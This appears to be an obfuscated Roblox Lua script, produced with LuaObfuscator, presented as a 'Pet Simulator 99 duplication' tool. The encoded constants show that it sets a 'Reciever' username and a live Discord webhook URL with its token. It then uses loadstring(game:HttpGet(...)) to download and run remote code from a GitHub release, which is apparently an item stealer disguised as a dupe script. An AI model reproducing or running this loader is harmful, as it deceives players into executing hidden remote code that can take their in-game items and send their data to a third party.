--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v109=v5(v83,v19);v19=nil;return v109;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/(((880 -(282 + 595)) -1)^(v32-1)))%((4 -2)^(((v33-(620 -((2192 -(1523 + 114)) + 64))) -(v32-1)) + 1)) ;return v85-(v85%(932 -(771 + 86 + 74))) ;end end else local v86=(570 -(367 + 201))^(v32-(928 -(214 + (1015 -302)))) ;return (((v31%(v86 + v86))>=v86) and (1 + (1065 -(68 + 997)))) or (0 + 0) ;end end local function v21() local v34=117 -(32 + (157 -72)) ;local v35;while true do if (v34==((0 -0) + 0)) then v35=v1(v16,v18,v18);v18=v18 + ((1621 -(87 + 263)) -(226 + 1044)) ;v34=(184 -(67 + 113)) -3 ;end if (v34==(2 -1)) then return v35;end end end local function v22() local v36=0;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (4 -(3 -1)) );v18=v18 + 2 + 0 + 0 ;v36=(1000 -(915 + 82)) -2 ;end if (v36==(953 -(802 + 150))) then return (v38 * (689 -433)) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (8 -5) );v18=v18 + 4 ;return (v42 * (9773502 + 7003714)) + (v41 * 65536) + (v40 * (336 -80)) + v39 ;end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 + (0 -0))) then v48=v20(v45,1208 -(1069 + 118) ,110 -79 );v49=((v20(v45,891 -(814 + 45) )==(2 -1)) and  -(1 -0)) or (1 + 0) ;v43=2 + 1 ;end if (v43==(0 + 0 + 0)) then v44=v23();v45=v23();v43=(2 -1) -(1413 -(447 + 966)) ;end if (v43==((704 -(376 + 325)) + 0)) then if (v48==(791 -(368 + (693 -270)))) then if (v47==(0 -0)) then return v49 * ((49 -31) -(10 + (24 -16))) ;else v48=3 -2 ;v46=442 -(416 + 26) ;end elseif (v48==(7047 -5000)) then return ((v47==(0 -0)) and (v49 * ((1 + 0)/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1461 -(145 + 293)) ) * (v46 + (v47/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end if (v43==(3 -2)) then v46=1818 -(1703 + 114) ;v47=(v20(v45,1 + 0 ,7 + 13 ) * ((2 + 0)^(804 -(201 + 571)))) + v44 ;v43=1140 -(116 + 1022) ;end end end local function v25(v50) local v51=(254 -(163 + 91)) -0 ;local v52;local v53;while true do if (v51==(14 -(9 + (1935 -(1869 + 61))))) then v52=nil;if  not v50 then v50=v23();if (v50==(376 -(85 + 291))) then return "";end end v51=1;end if (v51==(1267 -(243 + 1022))) then v53={};for v93=3 -2 , #v52 do v53[v93]=v2(v1(v3(v52,v93,v93)));end v51=3 + 0 ;end if (v51==(1183 -(314 + 809 + 57))) then return v6(v53);end if (v51==1) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=(6 -4) + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0 -0 ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do if (v54==(7 -4)) then for v95= #"<",v23() do local v96=(function() return v21();end)();if (v20(v96, #"/", #"<")~=(0 -0)) then else local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v104==(585 -(57 + 527))) then local v115=(function() return 560 -(306 + 254) ;end)();while true do if (1~=v115) then else v104=(function() return 1 + 1 ;end)();break;end if (v115~=(0 -0)) then else v107=(function() return nil;end)();v108=(function() return nil;end)();v115=(function() return 1468 -(899 + 568) ;end)();end end end if (v104==0) then local v116=(function() return 0;end)();while true do if (v116~=(0 + 0)) then else local v123=(function() return 0;end)();while true do if (v123==0) then v105=(function() return 0 -0 ;end)();v106=(function() return nil;end)();v123=(function() return 604 -(268 + 335) ;end)();end if (1==v123) then v116=(function() return 1 + 0 ;end)();break;end end end if (v116==(1 -0)) then v104=(function() return 2 -1 ;end)();break;end end end if (v104~=(292 -(60 + 230))) then else while true do if (v105==(572 -(426 + 146))) then local v124=(function() return 0 -0 ;end)();while true do if (v124~=(1 + 0)) then else v105=(function() return  #"]";end)();break;end if (v124==(1456 -(282 + 1174))) then v106=(function() return v20(v96,813 -(569 + 242) , #"nil");end)();v107=(function() return v20(v96, #"http",17 -11 );end)();v124=(function() return 66 -(30 + 35) ;end)();end end end if ( #"-19"==v105) then if (v20(v107, #"gha", #"xxx")== #".") then v108[ #".com"]=(function() return v61[v108[ #"0313"]];end)();end v56[v95]=(function() return v108;end)();break;end if (v105== #"]") then local v126=(function() return 0 + 0 ;end)();local v127=(function() return;end)();while true do if (v126==(1024 -(706 + 318))) then v127=(function() return 0 + 0 ;end)();while true do if (v127==(1252 -(721 + 530))) then v105=(function() return 1273 -(945 + 326) ;end)();break;end if (v127~=(0 -0)) then else v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(0 + 0)) then local v191=(function() return 700 -(271 + 429) ;end)();local v192=(function() return;end)();while true do if (v191==(0 + 0)) then v192=(function() return 320 -(53 + 267) ;end)();while true do if (v192==(1500 -(1408 + 92))) then v108[ #"asd"]=(function() return v22();end)();v108[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v106== #":") then v108[ #"gha"]=(function() return v23();end)();elseif (v106==2) then v108[ #"xnx"]=(function() return v23() -((1 + 1)^(1102 -(461 + 625))) ;end)();elseif (v106== #"asd") then local v199=(function() return 0;end)();local v200=(function() return;end)();while true do if (v199==(1288 -(993 + 295))) then v200=(function() return 0;end)();while true do if (v200==(413 -(15 + 398))) then v108[ #"19("]=(function() return v23() -((1 + 1)^16) ;end)();v108[ #".com"]=(function() return v22();end)();break;end end break;end end end v127=(function() return 1;end)();end end break;end end end if ((7 -5)~=v105) then else local v128=(function() return 1171 -(418 + 753) ;end)();while true do if (v128~=(1 + 0)) then else v105=(function() return  #"19(";end)();break;end if (v128==0) then if (v20(v107, #"~", #" ")~= #"~") then else v108[2]=(function() return v61[v108[2]];end)();end if (v20(v107,852 -(20 + 830) ,2)== #"}") then v108[ #"19("]=(function() return v61[v108[ #"gha"]];end)();end v128=(function() return 1;end)();end end end end break;end end end end for v97= #"[",v23() do v57,v97,v28=(function() return v55(v57,v97,v28);end)();end return v59;end if (v54~=(1 + 1)) then else local v89=(function() return 0 + 0 ;end)();local v90=(function() return;end)();while true do if ((0 + 0)==v89) then v90=(function() return 0 + 0 ;end)();while true do if ((0 + 0)==v90) then v61=(function() return {};end)();for v118= #" ",v60 do local v119=(function() return 529 -(406 + 123) ;end)();local v120=(function() return;end)();local v121=(function() return;end)();local v122=(function() return;end)();while true do if (v119==(1769 -(1749 + 20))) then v120=(function() return 0;end)();v121=(function() return nil;end)();v119=(function() return 1;end)();end if (v119==(1 + 0)) then v122=(function() return nil;end)();while true do if (v120~=(1 + 0)) then else if (v121== #"{") then v122=(function() return v21()~=(1322 -(1249 + 73)) ;end)();elseif (v121==(1 + 1)) then v122=(function() return v24();end)();elseif (v121== #"-19") then v122=(function() return v25();end)();end v61[v118]=(function() return v122;end)();break;end if (v120==(0 -0)) then local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172~=0) then else v173=(function() return 1145 -(466 + 679) ;end)();while true do if ((406 -(118 + 287))==v173) then v120=(function() return 3 -2 ;end)();break;end if (v173~=0) then else v121=(function() return v21();end)();v122=(function() return nil;end)();v173=(function() return 1;end)();end end break;end end end end break;end end end v90=(function() return 1122 -(118 + 1003) ;end)();end if ((2 -1)~=v90) then else v59[ #"gha"]=(function() return v21();end)();v54=(function() return 8 -5 ;end)();break;end end break;end end end if (v54==1) then local v91=(function() return 1900 -(106 + 1794) ;end)();while true do if (v91~=(378 -(142 + 235))) then else v60=(function() return v23();end)();v54=(function() return 2;end)();break;end if (v91~=0) then else v58=(function() return {};end)();v59=(function() return {v56,v57,nil,v58};end)();v91=(function() return 1 + 0 ;end)();end end end if (v54~=(977 -(553 + 424))) then else local v92=(function() return 0;end)();while true do if (v92==(0 + 0)) then v55=(function() return function(v110,v111,v112) local v113=(function() return 0 + 0 ;end)();local v114=(function() return;end)();while true do if (v113==0) then v114=(function() return 0;end)();while true do if (v114==0) then v110[v111-#"}" ]=(function() return v112();end)();return v110,v111,v112;end end break;end end end;end)();v56=(function() return {};end)();v92=(function() return 1 -0 ;end)();end if (v92==(1 + 0)) then v57=(function() return {};end)();v54=(function() return 1;end)();break;end end end end end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[2 + 0 ];local v67=v62[2 + 1 + 0 ];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1 -0 ;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(2 -1) ;local v77={};local v78={};for v87=0 -0 ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + (339 -(118 + 220)) + 0 + 0 ];else v78[v87]=v75[v87 + (684 -(483 + 200)) ];end end local v79=(v76-v70) + (4 -3) ;local v80;local v81;while true do local v88=753 -(239 + 514) ;while true do if ((1905<2867) and ((0 -(449 -(108 + 341)))==v88)) then v80=v68[v72];v81=v80[1 + 0 ];v88=1330 -(797 + 532) ;end if (v88==(3 -(1 + 1))) then if (v81<=(8 + 2)) then if ((v81<=(2 + 2)) or (1796>=4051)) then if (v81<=(2 -1)) then if (v81>(1202 -(373 + 829))) then if (v78[v80[733 -(476 + 255) ]]==v80[(4794 -3660) -(369 + 761) ]) then v72=v72 + 1 + (1493 -(711 + 782)) ;else v72=v80[(9 -4) -2 ];end else v64[v80[7 -4 ]]=v78[v80[3 -1 ]];end elseif (v81<=2) then local v131=238 -(64 + 174) ;local v132;while true do if (v131==(0 + 0)) then v132=v80[2 -0 ];v78[v132]=v78[v132](v13(v78,v132 + (337 -(144 + 192)) ,v73));break;end end elseif (v81==3) then do return;end else local v151=216 -(42 + 174) ;local v152;local v153;local v154;local v155;while true do if (v151==(2 + 0)) then for v189=v152,v73 do local v190=0 + 0 ;while true do if ((1619<=3756) and (v190==(0 + 0))) then v155=v155 + (1505 -(363 + 1141)) ;v78[v189]=v153[v155];break;end end end break;end if (v151==(1580 -(1183 + 397))) then v152=v80[5 -3 ];v153,v154=v71(v78[v152](v13(v78,v152 + (470 -(270 + 199)) + 0 ,v80[1 + 2 ])));v151=766 -(574 + 191) ;end if (v151==(1 + 0)) then v73=(v154 + v152) -((1820 -(580 + 1239)) + 0) ;v155=1975 -(1913 + 62) ;v151=2 + 0 ;end end end elseif (v81<=(18 -11)) then if ((604==604) and (v81<=(131 -(55 + 71)))) then local v133=1933 -(565 + 1368) ;local v134;local v135;while true do if (v133==(0 -0)) then v134=v80[(4943 -3280) -(1477 + 184) ];v135=v78[v80[8 -5 ]];v133=1 -0 ;end if ((v133==(1 -0)) or (4484==900)) then v78[v134 + 1 + 0 ]=v135;v78[v134]=v135[v80[860 -(564 + 292) ]];break;end end elseif (v81==(7 -1)) then v64[v80[4 -1 ]]=v78[v80[5 -3 ]];elseif ((v78[v80[306 -(244 + 60) ]]==v80[4 + 0 ]) or (4459<=1113)) then v72=v72 + (477 -(41 + 416 + 19)) ;else v72=v80[1004 -(938 + 63) ];end elseif (v81<=(1894 -(927 + 35 + 924))) then v72=v80[3 + 0 + 0 ];elseif (v81>9) then do return;end else v78[v80[(2942 -1815) -(936 + 189) ]]=v64[v80[1 + 0 + 2 ]];end elseif ((3632>3398) and (v81<=(1628 -(1565 + 48)))) then if ((4082<=4917) and (v81<=(8 + 4))) then if (v81>(1149 -(782 + (1523 -(645 + 522))))) then v78[v80[269 -(176 + (1881 -(1010 + 780))) ]]=v64[v80[7 -4 ]];else v78[v80[287 -(175 + 110) ]]();end elseif ((4832>=1386) and (v81<=(18 -5))) then v72=v80[1095 -(975 + 117) ];elseif ((137==137) and (v81==(1810 -(503 + 1293)))) then v78[v80[1877 -(157 + 1718) ]]=v80[3];else v78[v80[2 + 0 ]]=v80[3 + 0 ];end elseif (v81<=(1079 -(810 + 251 + 0))) then if ((v81<=(56 -40)) or (1570>=4332)) then local v140=v80[6 -(19 -15) ];local v141,v142=v71(v78[v140](v13(v78,v140 + (1019 -(697 + 321)) ,v80[7 -4 ])));v73=(v142 + v140) -(1 -0) ;local v143=0 -0 ;for v148=v140,v73 do local v149=733 -(711 + 22) ;while true do if ((0 + 0)==v149) then v143=v143 + (1 -0) ;v78[v148]=v141[v143];break;end end end elseif ((v81>(45 -28)) or (4064<=1819)) then local v164=v80[(3601 -2372) -(322 + 905) ];local v165=v78[v80[(1837 -(1045 + 791)) + 2 ]];v78[v164 + (612 -(602 + 9)) ]=v165;v78[v164]=v165[v80[4]];else v78[v80[1746 -(1344 + 400) ]]();end elseif ((v81<=(424 -((645 -390) + 150))) or (4986<1574)) then local v144=1189 -(449 + 740) ;local v145;while true do if ((872 -(826 + (69 -23)))==v144) then v145=v80[949 -(245 + 702) ];v78[v145]=v78[v145](v13(v78,v145 + ((508 -(351 + 154)) -(1576 -(1281 + 293))) ,v73));break;end end elseif ((4426>172) and (v81>(7 + 13))) then v78[v80[1900 -(260 + 1638) ]]=v80[3 -0 ]~=((706 -(28 + 238)) -(382 + (129 -71))) ;else v78[v80[6 -4 ]]=v80[3 + 0 ]~=((1559 -(1381 + 178)) + 0) ;end v72=v72 + (1 -(0 + 0)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C796865725363726970742F70732O392D6475706C69636174696F6E2F6D61696E2F72656C6561736503083O00526563696576657203073O002O336F6C662O3303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323736393730313038342O38373831392O342F6C486F39614F376F364D54464F5A4132364131364B6A6C505955542O687651427663314F555034637767787752626A6C45433130682D3579464E5769672O5A705158446100153O00120F3O00013O0026013O000C000100020004083O000C0001001209000100033O001209000200043O00200500020002000500120F000400064O0014000500014O0004000200054O000200013O00022O000B0001000100010004083O001400010026013O0001000100010004083O0001000100120F000100083O00122O000100073O00120F0001000A3O00122O000100093O00120F3O00023O0004083O000100012O000A3O00017O00",v9(),...);
